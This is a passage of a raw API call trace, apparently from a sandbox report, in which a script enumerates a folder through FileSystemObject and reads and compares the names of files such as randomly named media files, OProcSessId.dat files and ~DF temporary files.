riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.432] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Rxy7_FuBg3SPkH97CHhC.wav", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.432] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.432] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.432] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.432] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TyldrZD2evx0R4.jpg", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.432] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.432] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.433] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.433] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VePN7-.xls", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.433] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.433] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.433] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.433] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wnrP.gif", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.433] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.434] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.434] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.434] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="xBxuRNJnFTgs2o.avi", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.434] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.434] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.434] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.434] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="YavANoBE6.swf", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.434] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.435] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.435] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.435] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="z8pByp9fSdp0zep6vk5l.bmp", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.435] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.435] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.436] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="{2E35062B-B731-474B-A322-1CB2EAB3D5C4} - OProcSessId.dat", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.436] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.436] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6e4bed4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.437] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="{69F3518B-5595-4AA3-BE65-7BF2957C85FB} - OProcSessId.dat", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.437] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.437] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6e4bed4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.437] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DF0D5A170AB7693A28.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.438] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.438] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.438] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DF23FF9354B6F75757.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.438] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.438] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.438] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DF35C9A64900EE6860.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.439] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.439] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.439] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.439] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DF54E89D6A930C012F.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.439] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.439] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.440] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DF6FC5F29BC95E86DE.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.440] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.440] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.440] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DFEFAFF022338D0FE2.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 